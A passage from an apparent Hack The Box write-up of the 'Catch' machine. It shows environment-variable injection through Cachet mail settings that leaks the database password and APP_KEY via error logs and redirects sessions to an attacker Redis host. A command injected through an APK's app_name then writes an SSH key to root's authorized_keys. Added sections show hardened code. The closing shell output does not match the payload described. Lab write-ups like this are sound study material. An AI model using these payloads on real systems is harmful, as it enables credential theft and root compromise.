Cookie: connect.sid=s%3AFRMmg1i7QWzsU1sc2RmJDoPKtqLR3TEI.%2BUurwNOUjapfUnIfaMLlHL6hTWA%2FMuaGfx26rM48V4Q; XSRF-TOKEN=eyJpdiI6ImU0VWV6M3RTMTlMRnl5MDg1WnlJTVE9PSIsInZhbHVlIjoiMjJkT3NKK3E1Kzh5cENObXU5UVNcLytsUUtOaFJYS3Y0TG8zTFwvWkxyR0RtWElnbHdyc0N1ZFNFamVLaVRzak1NIiwibWFjIjoiNTQxNTFkMjI5NzE1MDA1YjVjY2FiNDU2ZWU3ZTE1MDVkN2RhZDgzZDE0ZDQ0YjM5MmNmOWZjMGY4NzRjZTU2NyJ9; laravel_session=eyJpdiI6IjF2djBvVkpPZXk5eDFTa1EyaGVSb2c9PSIsInZhbHVlIjoiTjNSdW5WMFwvQlQ3MTZ1a1Eya2FQdWt4aDNTQWlWR0s1K2VsdXg1cTN1MVdpckFMelpMeVBCS3BtdXpZZTBMelIiLCJtYWMiOiI2M2EzZDIwOGZhMTNjNGFmOThkNDJjMTU2NjRjMWEyYmE4OGM0YTc5YmMyNThjNDFhODNiZmY0MWE2MTZjMjFhIn0%3D; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IndyZzhSSWVuY1R3ZFwvUkI3T0szUWVBPT0iLCJ2YWx1ZSI6IkFoWE91YkpaZUNsQWtWYXVPTHM0WXBabXhJXC9cL1JWdW50b1pPR2RNVFIyNDBJWEZuNEJjbTBiZlVNbUVLdFhWeUpDZnB1MGM2eVFVUmpmNkc2MmxzVzRFRkgzKzBXekdvUWx4ZEs3Q1U3V2VVQWRUSUZGMXBGMjJaK2xGQUJid0VYa1wvYWJnTmJiVkZWU0lGeTFlVVUyZFRvMmR6VDA0aTVUWkpHeDJBZnJYRT0iLCJtYWMiOiI2YTUzZWE5ZjQyZmJjNDRiMGM1ZDBjNzc0MzNiZmQzMTFlZDg5NzJmMTczYWRmZjhlNDI2YWY4YmRjMWE0N2Q3In0%3D
Upgrade-Insecure-Requests: 1

-----------------------------310896443037174447463705833016
Content-Disposition: form-data; name="_token"

mcThhLWjGtiaNgCPJOF54G2vT2jN9wAdZoDZ81tc
-----------------------------310896443037174447463705833016
Content-Disposition: form-data; name="config[mail_driver]"

${DB_PASSWORD}
-----------------------------310896443037174447463705833016
Content-Disposition: form-data; name="config[mail_host]"

filefile\nREDIS_HOST=10.10.14.16\nREDIS_DATABASE=0\nREDIS_PORT=6379\nSESSION_DRIVER=redis
-----------------------------310896443037174447463705833016
Content-Disposition: form-data; name="config[mail_address]"

[email protected]
-----------------------------310896443037174447463705833016
Content-Disposition: form-data; name="config[mail_username]"


-----------------------------310896443037174447463705833016
Content-Disposition: form-data; name="config[mail_password]"


-----------------------------310896443037174447463705833016--

From the resulting error in the log we get the password: s2#4Fg0_%3!

#77 /var/www/html/Cachet/public/index.php(54): Illuminate\\Foundation\\Http\\Kernel->handle(Object(Illuminate\\Http\\Request))
#78 {main}
"} 
[2022-04-08 19:51:13] production.ERROR: InvalidArgumentException: Driver [s2#4Fg0_%3!] not supported. in /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Support/Manager.php:99
Stack trace:
#0 /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Support/Manager.php(71): Illuminate\Support\Manager->createDriver('s2#4Fg0_%3!')

Stealing APP_KEY

The same trick with ${APP_KEY} leaks the application key:

#77 /var/www/html/Cachet/public/index.php(54): Illuminate\\Foundation\\Http\\Kernel->handle(Object(Illuminate\\Http\\Request))
#78 {main}
"} 
[2022-04-08 20:04:07] production.ERROR: InvalidArgumentException: Driver [base64:9mUxJeOqzwJdByidmxhbJaa74xh3ObD79OI6oG1KgyA=] not supported. in /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Support/Manager.php:99
Stack trace:
#0 /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Support/Manager.php(71): Illuminate\Support\Manager->createDriver('base64:9mUxJeOq...')

Now we do the same for the username.

The log reveals the username will, so we now have the credential pair will:s2#4Fg0_%3!

#39 /var/www/html/Cachet/public/index.php(54): Illuminate\\Foundation\\Http\\Kernel->handle(Object(Illuminate\\Http\\Request))
#40 {main}
"} 
[2022-04-16 17:31:18] production.ERROR: InvalidArgumentException: Driver [will] not supported. in /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Support/Manager.php:99
Stack trace:
#0 /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Support/Manager.php(71): Illuminate\Support\Manager->createDriver('will')
#1 /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Mail/MailServiceProvider.php(102): Illuminate\Support\Manager->driver()
#2 /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Container/Container.php(776): Illuminate\Mail\MailServiceProvider->Illuminate\Mail\{closure}(Object(Illuminate\Foundation\Application), Array)
#3 /var/www/html/Cachet/vendor/laravel/framework/src/Illuminate/Container/Container.php(658): Illuminate\Container\Container->build(Object(Closure))
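As an added example (my own code, not Cachet’s or Laravel’s), the script below shows the mechanism behind the three log entries above: a naive .env writer that stores form values verbatim next to a hardened one, and a minimal dotenv reader that performs ${VAR} expansion the way dotenv libraries do. With the naive writer the captured mail_driver value expands to the database password and the newline in mail_host smuggles in extra keys; the hardened writer rejects control characters and single-quotes values so no expansion happens. The .env content and secret values are constructed placeholders, and the function names are mine.

```python
"""Why unsanitised settings written to a dotenv file leak secrets.

Added example, not Cachet's or Laravel's code: a vulnerable .env writer beside a
hardened one, and a minimal dotenv reader with ${VAR} expansion. The .env
content, the secrets and the host name are constructed placeholders.
"""
import re

# Constructed .env as it might look before the settings form is submitted.
BASE_ENV = (
    "APP_KEY=base64:PLACEHOLDER_APP_KEY=\n"
    "DB_PASSWORD=PLACEHOLDER_DB_PASSWORD\n"
    "MAIL_DRIVER=smtp\n"
    "MAIL_HOST=localhost\n"
)

# The two values from the captured request, with a placeholder for the host.
FORM_VALUES = {
    "MAIL_DRIVER": "${DB_PASSWORD}",
    "MAIL_HOST": "filefile\nREDIS_HOST=PLACEHOLDER_HOST\nSESSION_DRIVER=redis",
}


def _drop_key(env_text, key):
    return [line for line in env_text.splitlines() if not line.startswith(key + "=")]


def write_env_naive(env_text, key, value):
    """Vulnerable: writes KEY=value verbatim, so '$' and newlines survive into the file."""
    lines = _drop_key(env_text, key)
    lines.append(f"{key}={value}")
    return "\n".join(lines) + "\n"


def write_env_safe(env_text, key, value):
    """Hardened: validate the key, reject control characters, single-quote the value.

    Single quotes are the dotenv convention for a literal value: no ${VAR}
    expansion is performed inside them, and an embedded quote is escaped.
    """
    if not re.fullmatch(r"[A-Z][A-Z0-9_]*", key):
        raise ValueError("bad env key")
    if re.search(r"[\x00-\x1f\x7f]", value):
        raise ValueError("control character in env value")
    quoted = "'" + value.replace("'", "\\'") + "'"
    lines = _drop_key(env_text, key)
    lines.append(f"{key}={quoted}")
    return "\n".join(lines) + "\n"


def load_env(env_text):
    """Minimal dotenv reader: KEY=value per line, ${VAR} expanded except inside single quotes."""
    env = {}
    for line in env_text.splitlines():
        if "=" not in line or line.startswith("#"):
            continue
        key, _, raw = line.partition("=")
        if len(raw) >= 2 and raw[0] == raw[-1] == "'":
            env[key] = raw[1:-1].replace("\\'", "'")  # literal, no expansion
        else:
            env[key] = re.sub(r"\$\{([A-Z0-9_]+)\}", lambda m: env.get(m.group(1), ""), raw)
    return env


def apply_form(writer, env_text=BASE_ENV, values=FORM_VALUES):
    """Apply the captured form values with the given writer and return the loaded env."""
    for key, value in values.items():
        env_text = writer(env_text, key, value)
    return load_env(env_text)


def form_is_rejected(writer, values=FORM_VALUES):
    """True when the writer refuses at least one of the form values."""
    try:
        apply_form(writer, values=values)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    leaked = apply_form(write_env_naive)
    print("naive MAIL_DRIVER =", leaked["MAIL_DRIVER"], "| SESSION_DRIVER =", leaked.get("SESSION_DRIVER"))
    print("safe  rejects form:", form_is_rejected(write_env_safe))
    safe = apply_form(write_env_safe, values={"MAIL_DRIVER": "${DB_PASSWORD}"})
    print("safe  MAIL_DRIVER =", safe["MAIL_DRIVER"])
```

With the naive writer MAIL_DRIVER loads as the placeholder database password and SESSION_DRIVER becomes redis, exactly the two effects the captured request aims at; the hardened writer refuses the mail_host value outright and keeps the mail_driver value as the literal string ${DB_PASSWORD}.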

Let’s try to get access with SSH.

ssh will@catch.htb

and we have access:

Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-104-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 16 Apr 2022 05:33:47 PM UTC

  System load:                      0.28
  Usage of /:                       74.7% of 16.61GB
  Memory usage:                     85%
  Swap usage:                       24%
  Processes:                        442
  Users logged in:                  0
  IPv4 address for br-535b7cf3a728: 172.18.0.1
  IPv4 address for br-fe1b5695b604: 172.19.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.150
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:e5ac

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

will@catch:~$

We can now read the user flag.

will@catch:~$ ls
user.txt
will@catch:~$ cat user.txt
880a854601427167e7da9fdf7ea58b53
will@catch:~$

Privilege Escalation

Enumeration

After running the enumeration script linpeas.sh we find the following bash script, /opt/mdm/verify.sh:

#!/bin/bash

###################
# Signature Check #
###################

sig_check() {
        jarsigner -verify "$1/$2" 2>/dev/null >/dev/null
        if [[ $? -eq 0 ]]; then
                echo '[+] Signature Check Passed'
        else
                echo '[!] Signature Check Failed. Invalid Certificate.'
                cleanup
                exit
        fi
}

#######################
# Compatibility Check #
#######################

comp_check() {
        apktool d -s "$1/$2" -o $3 2>/dev/null >/dev/null
        COMPILE_SDK_VER=$(grep -oPm1 "(?<=compileSdkVersion=\")[^\"]+" "$PROCESS_BIN/AndroidManifest.xml")
        if [ -z "$COMPILE_SDK_VER" ]; then
                echo '[!] Failed to find target SDK version.'
                cleanup
                exit
        else
                if [ $COMPILE_SDK_VER -lt 18 ]; then
                        echo "[!] APK Doesn't meet the requirements"
                        cleanup
                        exit
                fi
        fi
}

####################
# Basic App Checks #
####################

app_check() {
        APP_NAME=$(grep -oPm1 "(?<=<string name=\"app_name\">)[^<]+" "$1/res/values/strings.xml")
        echo $APP_NAME
        if [[ $APP_NAME == *"Catch"* ]]; then
                echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'
                mv "$3/$APK_NAME" "$2/$APP_NAME/$4"
        else
                echo "[!] App doesn't belong to Catch Global"
                cleanup
                exit
        fi
}


###########
# Cleanup #
###########

cleanup() {
        rm -rf $PROCESS_BIN;rm -rf "$DROPBOX/*" "$IN_FOLDER/*";rm -rf $(ls -A /opt/mdm | grep -v apk_bin | grep -v verify.sh)
}


###################
# MDM CheckerV1.0 #
###################

DROPBOX=/opt/mdm/apk_bin
IN_FOLDER=/root/mdm/apk_bin
OUT_FOLDER=/root/mdm/certified_apps
PROCESS_BIN=/root/mdm/process_bin

for IN_APK_NAME in $DROPBOX/*.apk;do
        OUT_APK_NAME="$(echo ${IN_APK_NAME##*/} | cut -d '.' -f1)_verified.apk"
        APK_NAME="$(openssl rand -hex 12).apk"
        if [[ -L "$IN_APK_NAME" ]]; then
                exit
        else
                mv "$IN_APK_NAME" "$IN_FOLDER/$APK_NAME"
        fi
        sig_check $IN_FOLDER $APK_NAME
        comp_check $IN_FOLDER $APK_NAME $PROCESS_BIN
        app_check $PROCESS_BIN $OUT_FOLDER $IN_FOLDER $OUT_APK_NAME
done
cleanup

Reading the script, it loops over every file with the .apk extension in the directory /opt/mdm/apk_bin. Each APK it finds is moved to /root/mdm/apk_bin and run through three checks: a signature check (jarsigner -verify), a compatibility check (the APK is decoded with apktool and compileSdkVersion is read from AndroidManifest.xml) and a basic app check (app_name is read from res/values/strings.xml). What makes this script very interesting is that it moves the file into /root/, so it is almost certainly executed by the root user.

Several of the script's variables are taken from the APK itself, and APP_NAME is the one we control: it is read from res/values/strings.xml and then fed unquoted into xargs -I {} sh -c 'mkdir {}', so whatever we put in the app_name string is evaluated by sh. We can therefore hide a payload in the app_name of our APK. We have to keep in mind that the name must still contain Catch, otherwise app_check exits before the mkdir line is reached.
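For comparison, here is an added example (my own code, not the box's verify.sh) of how the app_check step should have handled the name: the value is extracted from strings.xml, validated against an allowlist, and passed to mkdir as a single quoted argument, so the payload above is rejected instead of executed. It uses sed instead of grep -P so it also runs without GNU grep; the sample XML files are constructed for the demo.

```shell
#!/bin/bash
# Hardened rewrite of the app_name handling from verify.sh (added example).
# The original runs: echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'
# which hands the attacker-controlled string to a shell. Here the name is
# never interpreted by a shell: it is validated and then quoted.

# Extract app_name from a strings.xml file (first match only).
get_app_name() {
    sed -n 's/.*<string name="app_name">\([^<]*\)<.*/\1/p' "$1" | head -n 1
}

# Return 0 only for names that are safe to use as a directory name and that
# belong to Catch Global: letters, digits, space, dot, underscore, hyphen.
validate_app_name() {
    local name="$1"
    local re='^[A-Za-z0-9 ._-]+$'
    [[ "$name" =~ $re ]] || return 1
    [[ "$name" == *"Catch"* ]] || return 1
    return 0
}

# Quoted argument, no xargs, no sh -c: metacharacters stay literal.
safe_make_app_dir() {
    local out_dir="$1" name="$2"
    if ! validate_app_name "$name"; then
        echo "[!] Rejected app_name: $name" >&2
        return 1
    fi
    mkdir -p -- "$out_dir/$name"
}

# Demo on two constructed strings.xml files: a benign one and one carrying
# the same kind of injection string used against the box.
demo() {
    local tmp
    tmp=$(mktemp -d)
    printf '%s\n' '<resources><string name="app_name">Catch Mobile</string></resources>' > "$tmp/good.xml"
    printf '%s\n' '<resources><string name="app_name">Catch; echo pwned >> /tmp/x</string></resources>' > "$tmp/bad.xml"
    safe_make_app_dir "$tmp/out" "$(get_app_name "$tmp/good.xml")" && echo "[+] benign name accepted"
    safe_make_app_dir "$tmp/out" "$(get_app_name "$tmp/bad.xml")" || echo "[+] injection attempt rejected"
    rm -rf "$tmp"
}
```

Run demo to see the benign name create a directory while the injected string is refused before any shell sees it.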

Let’s generate a key pair on our host machine.

ssh-keygen -t ed25519 -f id_ed25519

Our payload.

<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">Catch; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJtbOqWeTwruW07yWzQ3qhLvKnFQBn3PRNc9vrDa7bP2 root@kali' >> /root/.ssh/authorized_keys </string>
</resources>

Own Catch.

listening on [any] 4444 ...
connect to [10.10.14.12] from catch.htb [10.10.11.150] 34642
sh: 0: can't access tty; job control turned off
# hostname; whoami; id
catch
root
uid=0(root) gid=0(root) groups=0(root)
# 

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.